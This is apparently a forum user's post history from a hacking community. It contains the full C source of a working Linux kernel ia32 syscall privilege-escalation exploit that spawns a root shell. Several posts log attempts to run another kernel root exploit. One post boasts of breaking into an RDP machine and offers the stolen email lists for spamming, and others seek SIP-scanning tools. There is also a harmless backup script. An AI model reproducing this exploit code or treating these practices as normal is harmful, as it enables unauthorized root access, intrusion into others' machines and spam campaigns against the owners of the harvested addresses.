Posts: 2637
Days Won: 89
Everything posted by Zatarra
-
Both. For Linux I know 2 but I have 1 more, and for Windows I know 1 and I also have 1 more. I could get hold of the second one for Linux too, if I do a search through the tower of CDs, but I don't really see the point.
-
Feedback: I tried it and it's really weak. It opens a lot of windows and eats up quite a few resources. Plus you wait an eternity until it checks all of them. Maybe in the future I'll do a test with a preset user and password. Until then I'm sticking with what I have. Thanks anyway
-
On: Bro, forget conquiztador.. that's a site of general ignorance with a ton of wrong and stupid questions. Go pick up a book and read it if you want to "cultivate" yourself. Off: We risk losing half of the "important" users
-
Encrypt it with ROT13.. the little hackers haven't heard of such a thing.. Both the encryption and the decryption method are trivial
-
Die-hard bug bytes Linux kernel for second time
Zatarra replied to Nytro's topic in Security News
I see you didn't post it up top.. so I'll post it. Remember, this is a POC!!!

/*
 * exploit for x86_64 linux kernel ia32syscall emulation (again)
 * rediscovered by ben hawkes
 * with help from robert swiecki and tavis ormandy
 *
 * original vulnerability discovered by Wojciech Purczynski
 *
 * original exploit by
 * Robert Swiecki <robert_at_swiecki.net>
 * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
 * Pawel Pisarczyk <pawel_at_immos.com.pl>
 *
 * kernel priv escalation code borrowed from spender
 *
 */

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>
#include <signal.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

unsigned long get_symbol(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	int ret = 0, oldstyle = 0;

	f = fopen("/proc/kallsyms", "r");
	if (f == NULL) {
		f = fopen("/proc/ksyms", "r");
		if (f == NULL)
			return 0;
		oldstyle = 1;
	}

	while (ret != EOF) {
		if (!oldstyle) {
			ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
		} else {
			ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
			if (ret == 2) {
				char *p;
				if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
					continue;
				}
				p = strrchr(sname, '_');
				if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
					p = p - 4;
					while (p > (char *)sname && *(p - 1) == '_') {
						p--;
					}
					*p = '\0';
				}
			}
		}
		if (ret == 0) {
			fscanf(f, "%s\n", sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			printf("resolved symbol %s to %p\n", name, (void *) addr);
			fclose(f);
			return addr;
		}
	}
	fclose(f);

	return 0;
}

static void docall(uint64_t *ptr, uint64_t size)
{
	commit_creds = (_commit_creds) get_symbol("commit_creds");
	if (!commit_creds) {
		printf("symbol table not available, aborting!\n");
		exit(1);
	}

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
	if (!prepare_kernel_cred) {
		printf("symbol table not available, aborting!\n");
		exit(1);
	}

	uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);
	printf("mapping at %lx\n", tmp);
	if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
	         MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
		printf("mmap fault\n");
		exit(1);
	}

	for (; (uint64_t) ptr < (tmp + size); ptr++)
		*ptr = (uint64_t)kernelmodecode;

	__asm__("\n"
	"\tmovq $0x101, %rax\n"
	"\tint $0x80\n");

	printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
	execl("/bin/sh", "bin/sh", NULL);
	printf("no /bin/sh ??\n");
	exit(0);
}

int main(int argc, char **argv)
{
	int pid, status, set = 0;
	uint64_t rax;
	uint64_t kern_s = 0xffffffff80000000;
	uint64_t kern_e = 0xffffffff84000000;
	uint64_t off = 0x0000000800000101 * 8;

	if (argc == 4) {
		docall((uint64_t*)(kern_s + off), kern_e - kern_s);
		exit(0);
	}

	if ((pid = fork()) == 0) {
		ptrace(PTRACE_TRACEME, 0, 0, 0);
		execl(argv[0], argv[0], "2", "3", "4", NULL);
		perror("exec fault");
		exit(1);
	}

	if (pid == -1) {
		printf("fork fault\n");
		exit(1);
	}

	for (;;) {
		if (wait(&status) != pid)
			continue;
		if (WIFEXITED(status)) {
			printf("Process finished\n");
			break;
		}
		if (!WIFSTOPPED(status))
			continue;
		if (WSTOPSIG(status) != SIGTRAP) {
			printf("Process received signal: %d\n", WSTOPSIG(status));
			break;
		}

		rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
		if (rax == 0x000000000101) {
			if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
				printf("PTRACE_POKEUSER fault\n");
				exit(1);
			}
			set = 1;
			//rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
		}

		if ((rax == 11) && set) {
			ptrace(PTRACE_DETACH, pid, 0, 0);
			for (;;)
				sleep(10000);
		}

		if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
			printf("PTRACE_SYSCALL fault\n");
			exit(1);
		}
	}

	return 0;
}
-
Thanks. I'll test it later this evening and come back with an edit. From what I see you also need a pass_file.
-
Bro, talk to a friend or something and tell him to host the server for you, I don't think it would be such a big sacrifice. You talk as if you hold data from the FBI, CIA, NSA and many other "high-society" organizations, to need a backup plan for power.. Off: Bro, honestly this is the topic of the day
-
Thanks a lot bro.. Just as well I found out that Team Viewer works for Linux too. P.S. If anyone has an idea how I could do ssh tunneling in Ubuntu 10.04, send me a PM. Thanks in advance. P.P.S. I want to point out that I want to get past the restrictions in the dorm and that I have external servers with 443 for ssh-tunneling.
-
They're posted, in case you can't see. Edit: They've already been downloaded a few times, now everything depends on the speed
-
I got into an older RDP and came across a little hacker's mail. There are about 30 lists of emails, but I think they're already spammed. Instead I have something relatively fresh for you. Find it here: emails 1 txt the leadsss txt P.S. First come first served. Peace
-
Hi. What do you think we do around here?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploits
I can't believe it.. another fail
book@portia:~$ uname -a
Linux portia 2.6.32-24-generic-pae #41-Ubuntu SMP Thu Aug 19 02:43:57 UTC 2010 i686 GNU/Linux
book@portia:~$ gcc a.c -o a
book@portia:~$ chmod +x a
book@portia:~$ ./a
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc0176210
[+] resolved symbol prepare_kernel_cred to 0xc0176550
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[-] kernel rejected malformed CAN header
book@portia:~$ id
uid=1019(book) gid=1002(company) groups=1002(company)
book@portia:~$
-
Thanks a lot bro.. a true gentleman
-
Why do you think it would be so dangerous?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploits
The update depends largely on the repositories, that's basically where it takes whatever is new from.
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploits
Tried again on Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail
ed3@daneel:~$ id
uid=1006(ed3) gid=1006(ed3) groups=1006(ed3)
ed3@daneel:~$ ./s
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff8108bd90
[+] resolved symbol prepare_kernel_cred to 0xffffffff8108c170
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[-] inconsistency detected with SLUB cache allocation, please try again
ed3@daneel:~$
-
I'll try it later this evening and come back with an edit. Hope it works
-
I'll post a backup script too, taken from a server. Maybe someone needs it ;-) If you have questions don't hesitate to post them

#!/bin/bash
#
# creates backups of essential files
#
DATA="/home /opt /root "
CONFIG="/etc /var/lib /var/named"
DATABACKUP="/mnt/drive2/backup/bofh/data"
CONFIGBACKUP="/mnt/drive2/backup/bofh/config"
DATABASEBACKUP="/mnt/drive2/backup/bofh/database"
LIST="/mnt/drive2/backlist_$$.txt"
#
echo "Starting backup at `date +%Y-%m-%d\ %H:%M:%S`"
echo ""
# split the output of date into $1..$6 (weekday month day time zone year)
set $(date)
#
if test "$1" = "Mon" ; then
# weekly a full backup of all data and config. settings:
#
  echo "Performing Full Data Backup..."
  tar cfz "/mnt/drive2/backup/bofh/data/data_full_$6-$2-$3.tgz" $DATA
  echo "Removing incremental data backups..."
  rm -f /mnt/drive2/backup/bofh/data/data_diff*
  echo "Removing two week old full backup..."
  find $DATABACKUP -depth -type f \( -ctime +13 -o -mtime +13 \) -print > $LIST
  rm -f `cat $LIST`
#
  echo ""
  echo "Performing Full Config Backup..."
  tar cfz "/mnt/drive2/backup/bofh/config/config_full_$6-$2-$3.tgz" $CONFIG
  echo "Removing incremental config backups..."
  rm -f /mnt/drive2/backup/bofh/config/config_diff*
  echo "Removing two week old full config backup..."
  find $CONFIGBACKUP -depth -type f \( -ctime +13 -o -mtime +13 \) -print > $LIST
  rm -f `cat $LIST`
else
# incremental backup: only files changed in the last day
#
  echo "Performing Incremental Data Backup..."
  find $DATA -depth -type f \( -ctime -1 -o -mtime -1 \) -print > $LIST
  tar cfzT "/mnt/drive2/backup/bofh/data/data_diff_$6-$2-$3.tgz" "$LIST"
  rm -f "$LIST"
#
  echo ""
  echo "Performing Incremental config Backup..."
  find $CONFIG -depth -type f \( -ctime -1 -o -mtime -1 \) -print > $LIST
  tar cfzT "/mnt/drive2/backup/bofh/config/config_diff_$6-$2-$3.tgz" "$LIST"
  rm -f "$LIST"
fi
#
#
echo ""
echo "Done!"
echo ""
echo "------------------------------------------------------------------------"
echo "Finished: `date +%Y-%m-%d\ %H:%M:%S`"
echo "------------------------------------------------------------------------"
echo ""
exit 0
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploits
Great. +rep for the tutorial, honestly I for one was too lazy to try it on Ubuntu
-
Adrian, how many minutes does a line last you on average? And can you somehow make it add lines automatically when they're free?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploits
Tried on CentOS:
Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
And nothing..
[+] looking for symbols...
[-] symbol table not availabe, aborting!
[-] symbol table not availabe, aborting!
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[-] kernel lacks CAN packet family support
[http@localhost ~]$
BTW: Did anyone else get this at compile time?
s.c: In function trigger:
s.c:544: warning: cast from pointer to integer of different size
s.c:571: warning: cast from pointer to integer of different size
-
Adrian, post sipscan7.1 somewhere too, does it need anything else besides curl? (I'm not interested in the mail)
-
Typically Romanian.. just today I was talking with a former high-school classmate who's at the academy.. it's full of brown-nosers and snitches there, too bad the punishments at the academy are worse. Anyway: Respect Synthesis
-
Patience first of all
-
Adrian, if you release the version send a PM or post it somewhere on here.. we might be interested ;-) if you need any ideas PM me. PS Send me a list of prefixes too please